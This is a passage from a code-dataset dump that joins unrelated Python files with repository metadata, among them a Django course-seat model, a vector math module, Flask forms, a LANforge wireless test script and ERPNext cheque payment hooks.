map_data['data'].append(tmp_data)
data_map[map_name] = map_data
elif tmp_map_data['type'] == 'line-chart':
map_data = data_map.get(map_name, {
'name': map_name,
'type': 'line-chart',
'data': [],
})
map_data['ex_data'] = tmp_map_data['ex_data']
map_data['layout'] = tmp_map_data['layout']
tmp_data = {'!!host': host}
tmp_data.update(tmp_map_data['data'])
map_data['data'].append(tmp_data)
data_map[map_name] = map_data
if env.is_setup:
node_result['msg'] = msg
if result_status is not None:
tmp_status = result_status
node_result['status'] = result_status
expected = cluster_run['expected_status']
if expected == result_status:
is_expected = True
log.info('{0}: {1} is expected status.'.format(
host, msg, result_status))
else:
is_contain_unexpected = True
log.error('expected status is {0}, bad status is {1}.'.format( # noqa
expected, result_status), host)
elif env.is_check:
node_result['check_msg'] = msg
if result_status is None:
result_status = status.SUCCESS
node_result.update({
'check_status': result_status,
})
if result_status != status.SUCCESS:
log.error('Failed check {0}.{1} [{2}]. {3}'.format( # noqa
script_name, candidate, result_status, msg), host)
if task_status == status.SUCCESS:
log.info('Success task {0}.{1} [{2}]. {3}'.format(
script_name, candidate, task_status, msg), host)
else:
log.error('Failed task {0}.{1} [{2}]. {3}'.format(
script_name, candidate, task_status, msg), host)
is_contain_failed = True
# end for host, result in results.items():
if len(data_map) > 0:
util.dump_datamap(data_map)
if is_contain_failed:
log.error('Failed task {0}.{1}. Exit setup.'.format(
script_name, candidate))
util.dump_status()
exit()
if tmp_status is not None:
env.fabscript['tmp_status'] = tmp_status
# for candidate in module_funcs:
# for func_pattern in func_patterns:
if env.is_setup:
if is_expected and not is_contain_unexpected or cluster_run['expected_status'] == 0:
env.cluster['__status']['fabscript_map'][script_name] = {
'status': cluster_run['expected_status'],
'task_status': status.SUCCESS,
}
util.dump_status()
else:
log.error('bad status.')
exit()
elif env.is_check:
env.cluster['__status']['fabscript_map'][script_name]['task_status'] = status.SUCCESS # noqa
util.dump_status()
elif env.is_manage:
env.cluster['__status']['fabscript_map'][script_name]['task_status'] = status.SUCCESS # noqa
util.dump_status()
# reset env
for key, value in default_env.items():
if value is not None:
setattr(env, key, value)
# end for cluster_run in run['runs']:
# end for run in env.runs:
| 41.661184
| 110
| 0.442953
|
85631ca7fe375d1f3bd69210ac4640aedd1bbd8b
| 470
|
py
|
Python
|
titan/react_pkg/uikit/__init__.py
|
mnieber/gen
|
65f8aa4fb671c4f90d5cbcb1a0e10290647a31d9
|
[
"MIT"
] | null | null | null |
titan/react_pkg/uikit/__init__.py
|
mnieber/gen
|
65f8aa4fb671c4f90d5cbcb1a0e10290647a31d9
|
[
"MIT"
] | null | null | null |
titan/react_pkg/uikit/__init__.py
|
mnieber/gen
|
65f8aa4fb671c4f90d5cbcb1a0e10290647a31d9
|
[
"MIT"
] | null | null | null |
from pathlib import Path
from moonleap import add, create
from titan.project_pkg.service import Tool
from titan.react_pkg.nodepackage import load_node_package_config
class UIkit(Tool):
pass
base_tags = [("uikit", ["tool"])]
@create("uikit")
def create_uikit(term):
uikit = UIkit(name="uikit")
uikit.add_template_dir(Path(__file__).parent / "templates")
uikit.output_path = "src"
add(uikit, load_node_package_config(__file__))
return uikit
| 21.363636
| 64
| 0.738298
|
dcd4702743d09df31d6d98330bb7952de30d9f91
| 3,450
|
py
|
Python
|
src/oscartest/getcrndetails/models.py
|
AlexanderPuckhaber/django-oscar-scraper
|
b58d8f0414572085fdec01aa991852cebb6cb290
|
[
"MIT"
] | 1
|
2021-01-12T22:09:39.000Z
|
2021-01-12T22:09:39.000Z
|
src/oscartest/getcrndetails/models.py
|
AlexanderPuckhaber/django-oscar-scraper
|
b58d8f0414572085fdec01aa991852cebb6cb290
|
[
"MIT"
] | null | null | null |
src/oscartest/getcrndetails/models.py
|
AlexanderPuckhaber/django-oscar-scraper
|
b58d8f0414572085fdec01aa991852cebb6cb290
|
[
"MIT"
] | null | null | null |
from django.db import models
# Create your models here.
from django.db.models import UniqueConstraint
class Semester(models.Model):
semester_str = models.CharField(primary_key=True, max_length=200)
semester_str_readable = models.CharField(max_length=200)
phase1_start_date = models.DateTimeField('start of Phase 1 registration', blank=True, null=True)
phase1_end_date = models.DateTimeField('end of Phase 1 registration', blank=True, null=True)
phase2_start_date = models.DateTimeField('start of Phase 2 registration', blank=True, null=True)
phase2_end_date = models.DateTimeField('end of Phase 2 registration', blank=True, null=True)
def __str__(self):
return self.semester_str
class Course(models.Model):
course_str = models.CharField(primary_key=True, max_length=50)
semester = models.ForeignKey(Semester, on_delete=models.CASCADE)
active = models.BooleanField(default=True)
def __str__(self):
return str(self.semester) + '/' + self.course_str
def course_str_as_list(self):
return self.course_str.split(' ')
class Section(models.Model):
semester = models.ForeignKey(Semester, on_delete=models.CASCADE)
crn = models.IntegerField(primary_key=True)
code = models.CharField(max_length=10, blank=True, null=True)
active=models.BooleanField(default=True)
course = models.ForeignKey(Course, on_delete=models.CASCADE, blank=True, null=True)
def __str__(self):
return str(self.course) + ':' + str(self.code)+ ':' + str(self.crn)
class SectionCapacities(models.Model):
section_crn = models.ForeignKey(Section, on_delete=models.CASCADE)
seats_capacity = models.IntegerField(default=0)
seats_actual = models.IntegerField(default=0)
seats_remaining = models.IntegerField(default=0)
seats_waitlist_capacity = models.IntegerField(default=0)
seats_waitlist_actual = models.IntegerField(default=0)
seats_waitlist_remaining = models.IntegerField(default=0)
def capacities_as_dict(self):
return {
'seats_capacity': self.seats_capacity,
'seats_actual': self.seats_actual,
'seats_remaining': self.seats_remaining,
'seats_waitlist_capacity': self.seats_waitlist_capacity,
'seats_waitlist_actual': self.seats_waitlist_actual,
'seats_waitlist_remaining': self.seats_waitlist_remaining,
'get_date': self.get_date
}
def capacities_as_list(self):
caps_list = [0]*7 # [list, declaration] not working here ;/
caps_list[0] = self.seats_capacity
caps_list[1] = self.seats_actual
caps_list[2] = self.seats_remaining
caps_list[3] = self.seats_waitlist_capacity
caps_list[4] = self.seats_waitlist_actual
caps_list[5] = self.seats_waitlist_remaining
caps_list[6] = self.get_date
return caps_list
get_date = models.DateTimeField()
class Meta:
constraints=[
models.UniqueConstraint(fields=['section_crn', 'get_date'], name='unique_section_date')
]
def __str__(self):
return str(self.section_crn) + ' date: ' + str(self.get_date) + \
' seats: ' + str(self.seats_capacity) + ',' + str(self.seats_actual) + ',' \
+ str(self.seats_remaining) + ',' + ' waitlist: ' + str(self.seats_waitlist_capacity) + ',' \
+ str(self.seats_waitlist_actual) + ',' + str(self.seats_waitlist_remaining)
| 40.588235
| 100
| 0.698841
|
d0ac68f8300ac131674fce185fec79f951a6f8ea
| 2,422
|
py
|
Python
|
Utils/py/RL_ActionSelection/env_0/tools/naoth/math3d.py
|
BerlinUnited/NaoTH
|
02848ac10c16a5349f1735da8122a64d601a5c75
|
[
"ECL-2.0",
"Apache-2.0"
] | 15
|
2015-01-12T10:46:29.000Z
|
2022-03-28T05:13:14.000Z
|
Utils/py/RL_ActionSelection/env_0/tools/naoth/math3d.py
|
BerlinUnited/NaoTH
|
02848ac10c16a5349f1735da8122a64d601a5c75
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2019-01-20T21:07:50.000Z
|
2020-01-22T14:00:28.000Z
|
Utils/py/RL_ActionSelection/env_0/tools/naoth/math3d.py
|
BerlinUnited/NaoTH
|
02848ac10c16a5349f1735da8122a64d601a5c75
|
[
"ECL-2.0",
"Apache-2.0"
] | 5
|
2018-02-07T18:18:10.000Z
|
2019-10-15T17:01:41.000Z
|
import math
class Vector3:
def __init__(self, x=0, y=0, z=0):
self.x = x
self.y = y
self.z = z
def __add__(self, other):
return Vector3(self.x + other.x, self.y + other.y, self.z + other.z)
def __sub__(self, other):
return Vector3(self.x - other.x, self.y - other.y, self.z - other.z)
def __neg__(self):
return Vector3(-self.x, -self.y, -self.z)
def abs(self):
return math.sqrt(self * self)
def __mul__(self, other):
if isinstance(other, Vector3):
return self.x * other.x + self.y * other.y + self.z * other.z
elif isinstance(other, (int, float, long)):
return Vector3(self.x * other, self.y * other, self.z * other)
else:
return NotImplemented
def __str__(self):
return "({0},{1},{2})".format(self.x, self.y, self.z)
class Matrix3x3:
def __init__(self, c1=Vector3(), c2=Vector3(), c3=Vector3()):
self.c1 = c1
self.c2 = c2
self.c3 = c3
def __mul__(self, other):
if isinstance(other, Matrix3x3):
return Matrix3x3(self * other.c1, self * other.c2, self * other.c3)
elif isinstance(other, Vector3):
return self.c1 * other.x + self.c2 * other.y + self.c3 * other.z
else:
return NotImplemented
def transpose(self):
return Matrix3x3(
Vector3(self.c1.x, self.c2.x, self.c3.x),
Vector3(self.c1.y, self.c2.y, self.c3.y),
Vector3(self.c1.z, self.c2.z, self.c3.z))
@classmethod
def eye(Matrix3x3):
return Matrix3x3(
Vector3(1, 0, 0),
Vector3(0, 1, 0),
Vector3(0, 0, 1)
)
def __str__(self):
return "{0} {1} {2}\n{3} {4} {5}\n{6} {7} {8}".format(
self.c1.x, self.c2.x, self.c3.x,
self.c1.y, self.c2.y, self.c3.y,
self.c1.z, self.c2.z, self.c3.z)
class Pose3D:
def __init__(self):
self.translation = Vector3()
self.rotation = Matrix3x3.eye()
def __mul__(self, other):
if isinstance(other, Vector3):
return self.rotation * other + self.translation
else:
return NotImplemented
def __invert__(self):
p = Pose3D()
p.rotation = self.rotation.transpose()
p.translation = p.rotation * (Vector3() - self.translation)
return p
| 28.494118
| 79
| 0.545417
|
759874c6d87e12fa478595d2b1509e3be00b09a1
| 1,630
|
py
|
Python
|
kajaas/index/forms.py
|
bandarupallibnk/azuretest
|
9829f603465e2f21811592f3ec1c6f688e0085e4
|
[
"MIT"
] | null | null | null |
kajaas/index/forms.py
|
bandarupallibnk/azuretest
|
9829f603465e2f21811592f3ec1c6f688e0085e4
|
[
"MIT"
] | null | null | null |
kajaas/index/forms.py
|
bandarupallibnk/azuretest
|
9829f603465e2f21811592f3ec1c6f688e0085e4
|
[
"MIT"
] | null | null | null |
from flask import Flask
from flask_wtf import FlaskForm
from wtforms import StringField,SubmitField,BooleanField,PasswordField,RadioField,DateField,SelectField
from wtforms.fields.html5 import EmailField
from wtforms.validators import DataRequired,EqualTo
class clsignup(FlaskForm):
username = StringField("User Name")
firstname = StringField("First Name")
lastname = StringField("Last Name") #currently not using
email = EmailField("Email Id",validators=[DataRequired()])
password = PasswordField("Password",validators=[EqualTo('confirmpassword')])
confirmpassword = PasswordField("Confirm Password",validators=[DataRequired()])
ageo18 = BooleanField("Confirm your age is over 18 years")
submit = SubmitField("Submit")
class clslogin(FlaskForm):
username = StringField("User Name")
password = PasswordField("Password")
login = SubmitField("Login")
class clsspongesignup(FlaskForm):
sfirstname = StringField("First Name")
smiddlename = StringField("Middle Name")
slastname = StringField("Last Name")
sdob = StringField("Date of Birth")
sgender = SelectField('Gender', choices=[('',''),('F','Female'),('M','Male'),('O','Other')])
semail = EmailField("Email Id")
susername = StringField("User Name")
spassword = PasswordField("Password",validators=[EqualTo('sconfirmpassword')])
sconfirmpassword = PasswordField("Confirm Password",validators=[DataRequired()])
ssubmit = SubmitField("Submit")
class clsspongelogin(FlaskForm):
susername = StringField("User Name")
spassword = PasswordField("Password")
slogin = SubmitField("Login")
| 40.75
| 103
| 0.730675
|
29f01d7a1f9792e89bd63c991d8878d664db7d09
| 12,660
|
py
|
Python
|
py-scripts/test_generic.py
|
shivamcandela/lanforge-scripts
|
285c91d7d414567f9c6a136f1556ab9fe7546efb
|
[
"BSD-2-Clause-FreeBSD",
"BSD-3-Clause"
] | 1
|
2021-09-27T08:45:56.000Z
|
2021-09-27T08:45:56.000Z
|
py-scripts/test_generic.py
|
shivamcandela/lanforge-scripts
|
285c91d7d414567f9c6a136f1556ab9fe7546efb
|
[
"BSD-2-Clause-FreeBSD",
"BSD-3-Clause"
] | null | null | null |
py-scripts/test_generic.py
|
shivamcandela/lanforge-scripts
|
285c91d7d414567f9c6a136f1556ab9fe7546efb
|
[
"BSD-2-Clause-FreeBSD",
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
import pprint
import sys
import os
if sys.version_info[0] != 3:
print("This script requires Python 3")
exit(1)
if 'py-json' not in sys.path:
sys.path.append(os.path.join(os.path.abspath('..'), 'py-json'))
import argparse
from LANforge.lfcli_base import LFCliBase
from LANforge import LFUtils
import realm
import time
import datetime
import json
class GenTest(LFCliBase):
def __init__(self, host, port, ssid, security, passwd, sta_list, name_prefix, upstream,
number_template="000", test_duration="5m", type="lfping", dest=None, cmd =None,
interval=1, radio=None, speedtest_min_up=None, speedtest_min_dl=None, speedtest_max_ping=None,
_debug_on=False,
_exit_on_error=False,
_exit_on_fail=False,):
super().__init__(host, port, _local_realm=realm.Realm(host,port), _debug=_debug_on, _halt_on_error=_exit_on_error, _exit_on_fail=_exit_on_fail)
self.ssid = ssid
self.radio = radio
self.upstream = upstream
self.sta_list = sta_list
self.security = security
self.passwd = passwd
self.number_template = number_template
self.name_prefix = name_prefix
self.test_duration = test_duration
if (speedtest_min_up is not None):
self.speedtest_min_up = float(speedtest_min_up)
if (speedtest_min_dl is not None):
self.speedtest_min_dl = float(speedtest_min_dl)
if (speedtest_max_ping is not None):
self.speedtest_max_ping = float(speedtest_max_ping)
self.debug = _debug_on
self.station_profile = self.local_realm.new_station_profile()
self.generic_endps_profile = self.local_realm.new_generic_endp_profile()
self.station_profile.lfclient_url = self.lfclient_url
self.station_profile.ssid = self.ssid
self.station_profile.ssid_pass = self.passwd,
self.station_profile.security = self.security
self.station_profile.number_template_ = self.number_template
self.station_profile.mode = 0
self.generic_endps_profile.name = name_prefix
self.generic_endps_profile.type = type
self.generic_endps_profile.dest = dest
self.generic_endps_profile.cmd = cmd
self.generic_endps_profile.interval = interval
def choose_ping_command(self):
gen_results = self.json_get("generic/list?fields=name,last+results", debug_=self.debug)
if self.debug:
print(gen_results)
if gen_results['endpoints'] is not None:
for name in gen_results['endpoints']:
for k, v in name.items():
if v['name'] in self.generic_endps_profile.created_endp and not v['name'].endswith('1'):
if v['last results'] != "" and "Unreachable" not in v['last results']:
return True, v['name']
else:
return False, v['name']
def choose_lfcurl_command(self):
return False, ''
def choose_speedtest_command(self):
gen_results = self.json_get("generic/list?fields=name,last+results", debug_=self.debug)
if gen_results['endpoints'] is not None:
for name in gen_results['endpoints']:
for k, v in name.items():
if v['last results'] is not None and v['name'] in self.generic_endps_profile.created_endp and v['last results'] != '':
last_results = json.loads(v['last results'])
if last_results['download'] is None and last_results['upload'] is None and last_results['ping'] is None:
return False, v['name']
elif last_results['download'] >= self.speedtest_min_dl and \
last_results['upload'] >= self.speedtest_min_up and \
last_results['ping'] <= self.speedtest_max_ping:
return True, v['name']
def choose_generic_command(self):
gen_results = self.json_get("generic/list?fields=name,last+results", debug_=self.debug)
if (gen_results['endpoints'] is not None):
for name in gen_results['endpoints']:
for k, v in name.items():
if v['name'] in self.generic_endps_profile.created_endp and not v['name'].endswith('1'):
if v['last results'] != "" and "not known" not in v['last results']:
return True, v['name']
else:
return False, v['name']
def start(self, print_pass=False, print_fail=False):
self.station_profile.admin_up()
temp_stas = []
for station in self.sta_list.copy():
temp_stas.append(self.local_realm.name_to_eid(station)[2])
if self.debug:
pprint.pprint(self.station_profile.station_names)
LFUtils.wait_until_ports_admin_up(base_url=self.lfclient_url, port_list=self.station_profile.station_names)
if self.local_realm.wait_for_ip(temp_stas):
self._pass("All stations got IPs")
else:
self._fail("Stations failed to get IPs")
self.exit_fail()
cur_time = datetime.datetime.now()
passes = 0
expected_passes = 0
self.generic_endps_profile.start_cx()
time.sleep(15)
end_time = self.local_realm.parse_time("30s") + cur_time
print("Starting Test...")
result = False
while cur_time < end_time:
cur_time = datetime.datetime.now()
if self.generic_endps_profile.type == "lfping":
result = self.choose_ping_command()
elif self.generic_endps_profile.type == "generic":
result = self.choose_generic_command()
elif self.generic_endps_profile.type == "lfcurl":
result = self.choose_lfcurl_command()
elif self.generic_endps_profile.type == "speedtest":
result = self.choose_speedtest_command()
elif self.generic_endps_profile.type == "iperf3":
result = self.choose_iperf3_command()
else:
continue
expected_passes += 1
# pprint.pprint(result)
if result is not None:
if result[0]:
passes += 1
else:
self._fail("%s Failed to ping %s " % (result[1], self.generic_endps_profile.dest))
break
time.sleep(1)
if passes == expected_passes:
self._pass("PASS: All tests passed")
def stop(self):
print("Stopping Test...")
self.generic_endps_profile.stop_cx()
self.station_profile.admin_down()
def build(self):
self.station_profile.use_security(self.security, self.ssid, self.passwd)
self.station_profile.set_number_template(self.number_template)
print("Creating stations")
self.station_profile.set_command_flag("add_sta", "create_admin_down", 1)
self.station_profile.set_command_param("set_port", "report_timer", 1500)
self.station_profile.set_command_flag("set_port", "rpt_timer", 1)
self.station_profile.create(radio=self.radio, sta_names_=self.sta_list, debug=self.debug)
self.generic_endps_profile.create(ports=self.station_profile.station_names, sleep_time=.5)
self._pass("PASS: Station build finished")
def cleanup(self, sta_list):
self.generic_endps_profile.cleanup()
self.station_profile.cleanup(sta_list)
LFUtils.wait_until_ports_disappear(base_url=self.lfclient_url, port_list=sta_list, debug=self.debug)
def main():
lfjson_port = 8080
parser = LFCliBase.create_basic_argparse(
prog='test_generic.py',
formatter_class=argparse.RawTextHelpFormatter,
epilog='''Create generic endpoints and test for their ability to execute chosen commands\n''',
description='''test_generic.py
--------------------
Generic command example:
python3 ./test_generic.py
--mgr localhost (optional)
--mgr_port 4122 (optional)
--upstream_port eth1 (optional)
--radio wiphy0 (required)
--num_stations 3 (optional)
--security {open|wep|wpa|wpa2|wpa3} (required)
--ssid netgear (required)
--passwd admin123 (required)
--type lfping {generic|lfping|iperf3-client | speedtest | iperf3-server |lf_curl} (required)
--dest 10.40.0.1 (required - also target for iperf3)
--test_duration 2m
--interval 1s
--debug
Example commands:
LFPING:
./test_generic.py --mgr localhost --mgr_port 4122 --radio wiphy0 --num_stations 7 --ssid jedway-wpa2-x2048-4-1 --passwd jedway-wpa2-x2048-4-1 --type lfping --dest 10.40.0.1 --security wpa2
LFCURL (under construction):
./test_generic.py --mgr localhost --mgr_port 4122 --radio wiphy1 --num_stations 26 --ssid jedway-wpa2-x2048-4-1 --passwd jedway-wpa2-x2048-4-1 --security wpa2 --type lfcurl --dest 10.40.0.1
GENERIC:
./test_generic.py --mgr localhost--mgr_port 4122 --radio wiphy1 --num_stations 2 --ssid jedway-wpa2-x2048-4-1 --passwd jedway-wpa2-x2048-4-1 --security wpa2 --type generic
SPEEDTEST:
./test_generic.py --mgr localhost --mgr_port 4122 --radio wiphy2 --num_stations 13 --ssid jedway-wpa2-x2048-4-1 --passwd jedway-wpa2-x2048-4-1 --type speedtest --speedtest_min_up 20
--speedtest_min_dl 20 --speedtest_max_ping 150 --security wpa2
IPERF3 (under construction):
./test_generic.py --mgr localhost --mgr_port 4122 --radio wiphy1 --num_stations 3 --ssid jedway-wpa2-x2048-4-1 --passwd jedway-wpa2-x2048-4-1 --security wpa2 --type iperf3
''')
parser.add_argument('--type', help='type of command to run: generic, lfping, iperf3-client, iperf3-server, lfcurl', default="lfping")
parser.add_argument('--cmd', help='specifies command to be run by generic type endp', default='')
parser.add_argument('--dest', help='destination IP for command', default="10.40.0.1")
parser.add_argument('--test_duration', help='duration of the test eg: 30s, 2m, 4h', default="2m")
parser.add_argument('--interval', help='interval to use when running lfping (1s, 1m)', default=1)
parser.add_argument('--speedtest_min_up', help='sets the minimum upload threshold for the speedtest type', default=None)
parser.add_argument('--speedtest_min_dl', help='sets the minimum download threshold for the speedtest type', default=None)
parser.add_argument('--speedtest_max_ping', help='sets the minimum ping threshold for the speedtest type', default=None)
args = parser.parse_args()
num_sta = 2
if (args.num_stations is not None) and (int(args.num_stations) > 0):
num_stations_converted = int(args.num_stations)
num_sta = num_stations_converted
station_list = LFUtils.portNameSeries(radio=args.radio,
prefix_="sta",
start_id_=0,
end_id_=num_sta-1,
padding_number_=100)
generic_test = GenTest(host=args.mgr, port=args.mgr_port,
number_template="00",
radio=args.radio,
sta_list=station_list,
name_prefix="GT",
type=args.type,
dest=args.dest,
cmd=args.cmd,
interval=1,
ssid=args.ssid,
upstream=args.upstream_port,
passwd=args.passwd,
security=args.security,
test_duration=args.test_duration,
speedtest_min_up=args.speedtest_min_up,
speedtest_min_dl=args.speedtest_min_dl,
speedtest_max_ping=args.speedtest_max_ping,
_debug_on=args.debug)
generic_test.cleanup(station_list)
generic_test.build()
if not generic_test.passes():
print(generic_test.get_fail_message())
generic_test.exit_fail()
generic_test.start()
if not generic_test.passes():
print(generic_test.get_fail_message())
generic_test.exit_fail()
generic_test.stop()
time.sleep(30)
generic_test.cleanup(station_list)
if generic_test.passes():
generic_test.exit_success()
if __name__ == "__main__":
main()
| 46.036364
| 194
| 0.620932
|
fb1e7f914e3409e305df1bdd927295deb9f9e84a
| 4,953
|
py
|
Python
|
cheque_management/api.py
|
cstkyrilos/cheque_management
|
d290a5ccda684bb1c7eaab2dcdd9dab7d0a1e4c7
|
[
"MIT"
] | null | null | null |
cheque_management/api.py
|
cstkyrilos/cheque_management
|
d290a5ccda684bb1c7eaab2dcdd9dab7d0a1e4c7
|
[
"MIT"
] | null | null | null |
cheque_management/api.py
|
cstkyrilos/cheque_management
|
d290a5ccda684bb1c7eaab2dcdd9dab7d0a1e4c7
|
[
"MIT"
] | 1
|
2021-08-22T16:13:30.000Z
|
2021-08-22T16:13:30.000Z
|
# -*- coding: utf-8 -*-
# Copyright (c) 2017, Direction and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe, erpnext
from frappe.utils import flt, cstr, nowdate, comma_and
from frappe import throw, msgprint, _
def pe_before_submit(self, method):
if self.mode_of_payment == "Cheque" and self.payment_type == "Receive":
notes_acc = frappe.db.get_value("Company", self.company, "receivable_notes_account")
if not notes_acc:
frappe.throw(_("Receivable Notes Account not defined in the company setup page"))
rec_acc = frappe.db.get_value("Company", self.company, "default_receivable_account")
if not rec_acc:
frappe.throw(_("Default Receivable Account not defined in the company setup page"))
self.db_set("paid_to", notes_acc)
self.db_set("paid_from", rec_acc)
if self.mode_of_payment == "Cheque" and self.payment_type == "Pay":
notes_acc = frappe.db.get_value("Company", self.company, "payable_notes_account")
if not notes_acc:
frappe.throw(_("Payable Notes Account not defined in the company setup page"))
rec_acc = frappe.db.get_value("Company", self.company, "default_payable_account")
if not rec_acc:
frappe.throw(_("Default Payable Account not defined in the company setup page"))
self.db_set("paid_from", notes_acc)
self.db_set("paid_to", rec_acc)
def pe_on_submit(self, method):
hh_currency = erpnext.get_company_currency(self.company)
if self.mode_of_payment == "Cheque" and self.paid_from_account_currency != hh_currency:
frappe.throw(_("You cannot use foreign currencies with Mode of Payment Cheque"))
if self.mode_of_payment == "Cheque" and self.paid_to_account_currency != hh_currency:
frappe.throw(_("You cannot use foreign currencies with Mode of Payment Cheque"))
if self.mode_of_payment == "Cheque" and self.payment_type == "Receive":
notes_acc = frappe.db.get_value("Company", self.company, "receivable_notes_account")
if not notes_acc:
frappe.throw(_("Receivable Notes Account not defined in the company setup page"))
self.db_set("paid_to", notes_acc)
rec_acc = frappe.db.get_value("Company", self.company, "default_receivable_account")
if not rec_acc:
frappe.throw(_("Default Receivable Account not defined in the company setup page"))
rc = frappe.new_doc("Receivable Cheques")
rc.cheque_no = self.reference_no
rc.cheque_date = self.reference_date
rc.customer = self.party
rc.company = self.company
rc.payment_entry = self.name
if self.project:
rc.project = self.project
rc.currency = hh_currency
rc.amount = self.base_received_amount
rc.exchange_rate = 1
rc.remarks = self.remarks
#rc.cheque_status = 1
rc.set("status_history", [
{
"status": "Cheque Received",
"transaction_date": nowdate(),
"credit_account": rec_acc,
"debit_account": notes_acc
}
])
rc.insert(ignore_permissions=True)
rc.submit()
message = """<a href="#Form/Receivable Cheques/%s" target="_blank">%s</a>""" % (rc.name, rc.name)
msgprint(_("Receivable Cheque {0} created").format(comma_and(message)))
if self.mode_of_payment == "Cheque" and self.payment_type == "Pay":
notes_acc = frappe.db.get_value("Company", self.company, "payable_notes_account")
if not notes_acc:
frappe.throw(_("Payable Notes Account not defined in the company setup page"))
self.db_set("paid_from", notes_acc)
rec_acc = frappe.db.get_value("Company", self.company, "default_payable_account")
if not rec_acc:
frappe.throw(_("Default Payable Account not defined in the company setup page"))
pc = frappe.new_doc("Payable Cheques")
pc.cheque_no = self.reference_no
pc.cheque_date = self.reference_date
pc.party_type = self.party_type
pc.party = self.party
pc.company = self.company
pc.payment_entry = self.name
if self.project:
pc.project = self.project
pc.currency = hh_currency
pc.amount = self.base_paid_amount
pc.exchange_rate = 1
pc.remarks = self.remarks
#pc.cheque_status = 1
pc.set("status_history", [
{
"status": "Cheque Issued",
"transaction_date": nowdate(),
"credit_account": notes_acc,
"debit_account": rec_acc
}
])
pc.insert(ignore_permissions=True)
pc.submit()
message = """<a href="#Form/Payable Cheques/%s" target="_blank">%s</a>""" % (pc.name, pc.name)
msgprint(_("Payable Cheque {0} created").format(comma_and(message)))
def pe_on_cancel(self, method):
if frappe.db.sql("""select name from `tabReceivable Cheques` where payment_entry=%s and docstatus<>2
and not cheque_status in ("Cheque Cancelled","Cheque Rejected")""" , (self.name)):
frappe.throw(_("Cannot Cancel this Payment Entry as it is Linked with Receivable Cheque"))
if frappe.db.sql("""select name from `tabPayable Cheques` where payment_entry=%s and docstatus<>2
and cheque_status<>'Cheque Cancelled'""" , (self.name)):
frappe.throw(_("Cannot Cancel this Payment Entry as it is Linked with Payable Cheque"))
return
| 43.831858
| 102
| 0.732889
|
d988acf8e010a32416ff96bc7831aab1c3a79e14
| 3,283
|
py
|
Python
|
config/settings.py
|
mpita/ox
|
04910527c6502c97b87010f833b0ac11294103bd
|
[
"MIT"
] | null | null | null |
config/settings.py
|
mpita/ox
|
04910527c6502c97b87010f833b0ac11294103bd
|
[
"MIT"
] | 1
|
2020-10-17T00:52:01.000Z
|
2020-10-23T23:42:27.000Z
|
config/settings.py
|
mpita/ox
|
04910527c6502c97b87010f833b0ac11294103bd
|
[
"MIT"
] | null | null | null |
"""
Django settings for config project.
Generated by 'django-admin startproject' using Django 3.1.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import environ
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
env = environ.Env()
environ.Env.read_env()
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env("DJANGO_SECRET_KEY", default="<Your-secret-key>")
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = env.bool("DJANGO_DEBUG", False)
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
# THIRD APPS
"versatileimagefield",
# LOCAL APPS
"apps.account.apps.AccountConfig",
]
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
ROOT_URLCONF = "config.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
],
},
},
]
WSGI_APPLICATION = "config.wsgi.application"
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": BASE_DIR / "db.sqlite3",
}
}
AUTH_USER_MODEL = "account.User"
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator",
},
{
"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator",
},
{
"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator",
},
{
"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator",
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = "en-us"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = "/static/"
| 25.061069
| 91
| 0.697228
|
1c17d1a795ad8df50e9817d4e3cd96d147ea8e45
| 6,313
|
py
|
Python
|
homeassistant/components/notify/__init__.py
|
EmitKiwi/home-assistant
|
0999e2ddc476f4bddf710005168b082f03a7cdc0
|
[
"Apache-2.0"
] | 4
|
2019-05-14T20:33:43.000Z
|
2021-09-25T14:56:08.000Z
|
homeassistant/components/notify/__init__.py
|
EmitKiwi/home-assistant
|
0999e2ddc476f4bddf710005168b082f03a7cdc0
|
[
"Apache-2.0"
] | null | null | null |
homeassistant/components/notify/__init__.py
|
EmitKiwi/home-assistant
|
0999e2ddc476f4bddf710005168b082f03a7cdc0
|
[
"Apache-2.0"
] | null | null | null |
"""
Provides functionality to notify people.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/notify/
"""
import asyncio
import logging
import os
from functools import partial
import voluptuous as vol
from homeassistant.setup import async_prepare_setup_platform
from homeassistant.exceptions import HomeAssistantError
from homeassistant.loader import bind_hass
import homeassistant.helpers.config_validation as cv
from homeassistant.config import load_yaml_config_file
